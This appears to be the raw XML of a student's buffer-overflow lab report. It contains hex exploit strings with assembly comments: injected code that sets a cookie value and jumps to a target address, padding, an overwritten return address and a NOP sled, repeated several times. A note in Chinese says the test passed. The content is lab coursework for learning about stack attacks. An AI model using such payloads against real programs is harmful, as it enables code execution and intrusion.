        <w:t>b8 ea 1b 56 2e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904AEC1" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* lea 0x10(%rsp), %rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B106AB" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>48 8d ac 24 10 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59599ED1" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* mov %eax, -4(%rbp) */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2EA9D1" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>89 45 fc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F35945D" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* pushq $0x401255 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05897AAC" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>68 55 12 40 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0633C585" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D392A" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F6BC6C" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="74A775F7" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rubbish */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576572CD" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w: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</w:r>
    </w:p>
    <w:p w14:paraId="69F1F5DE" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="027225DC" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70232516" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F52B7BB" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="735F395A" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret address */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27282948" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>d0 37 68 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC48519" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="7032F708" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>0a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3BDDC6" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="09B7D61E" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* 0x100 nop */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9DE0A3" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t xml:space="preserve"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</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBFBFB4" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="7A2A4B35" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* movl $0x2e561bea, %eax */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439422F8" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>b8 ea 1b 56 2e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250E6188" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* lea 0x10(%rsp), %rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0654A" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>48 8d ac 24 10 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA9B46" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* mov %eax, -4(%rbp) */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0723D301" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>89 45 fc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04628989" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* pushq $0x401255 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5342FAC6" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>68 55 12 40 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9B6C00" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B0F52" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D79608" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="3AA37132" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rubbish */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3A5F29" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w: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</w:r>
    </w:p>
    <w:p w14:paraId="7961731F" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="2A8A5430" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC8CE2" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D456C9B" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="0B643A1F" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret address */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F167980" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>d0 37 68 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3FECDB" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="7B6E60BA" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>0a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5481B13C" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="0E7939C5" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* 0x100 nop */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9EE6A" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t xml:space="preserve"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</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212C4D06" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="3B93A3F7" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* movl $0x2e561bea, %eax */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A060AD5" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>b8 ea 1b 56 2e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DA4786" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* lea 0x10(%rsp), %rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F6B7B9" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>48 8d ac 24 10 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F2F819" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* mov %eax, -4(%rbp) */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2479ED" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>89 45 fc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05663E56" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* pushq $0x401255 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E72166D" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>68 55 12 40 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D31B61" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CE3286" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B753A29" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="0B451DED" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rubbish */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7599B748" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w: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</w:r>
    </w:p>
    <w:p w14:paraId="2519291D" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="514AFD00" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D8BD12" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DA2DBC" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="5219691A" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret address */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E1E230" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>d0 37 68 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF19CF" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="077E1A41" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>0a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC1F36D" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="2AA45ED6" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* 0x100 nop */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED70118" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951EF41" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="77545C10" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* movl $0x2e561bea, %eax */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5CCEA4" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>b8 ea 1b 56 2e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55705B18" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* lea 0x10(%rsp), %rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526388C0" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>48 8d ac 24 10 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F821035" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* mov %eax, -4(%rbp) */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB48EA8" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>89 45 fc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D18EDB" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* pushq $0x401255 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6260DE" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>68 55 12 40 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2B0169" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE1EE09" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>c3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2575C7C2" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="327D13F3" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rubbish */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03732D25" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74978C13" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="74E5B879" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* rbp */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE2F8AA" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A4B3A" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D"/>
    <w:p w14:paraId="31D4D620" w14:textId="77777777" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>/* ret address */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2106E929" w14:textId="7427AE00" w:rsidR="00F9211D" w:rsidRDefault="00F9211D" w:rsidP="00F9211D">
      <w:r>
        <w:t>d0 37 68 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314B2B0A" w14:textId="2BBEEDFC" w:rsidR="00D31F5C" w:rsidRDefault="00D31F5C" w:rsidP="00F9211D"/>
    <w:p w14:paraId="56BC9DBC" w14:textId="160A5ACC" w:rsidR="00D31F5C" w:rsidRDefault="00D31F5C" w:rsidP="00F9211D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试通过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264A0440" w14:textId="68835356" w:rsidR="00D31F5C" w:rsidRDefault="00D31F5C" w:rsidP="00F9211D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1120FFBC" wp14:editId="6AE96600">
            <wp:extent cx="5274310" cy="1610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56"/>
    <w:rsid w:val="0004278A"/>
    <w:rsid w:val="001872F8"/>
    <w:rsid w:val="003020CE"/>
    <w:rsid w:val="00356CE3"/>
    <w:rsid w:val="0037225A"/>
    <w:rsid w:val="00420065"/>
    <w:rsid w:val="00423056"/>
    <w:rsid w:val="004E55C0"/>
    <w:rsid w:val="00557A1A"/>
    <w:rsid w:val="00935559"/>
    <w:rsid w:val="009F3F2C"/>
    <w:rsid w:val="00AF273F"/>
    <w:rsid w:val="00BE4F1B"/>
    <w:rsid w:val="00C76512"/>
    <w:rsid w:val="00D31F5C"/>
    <w:rsid w:val="00E43E4E"/>
    <w:rsid w:val="00F9211D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1DFD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E6698978-CD05-429F-A23A-205D56BB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5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C765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2098</Words>
  <Characters>11960</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>99</Lines>
  <Paragraphs>28</Paragraph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10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-01T14:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-01T16:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>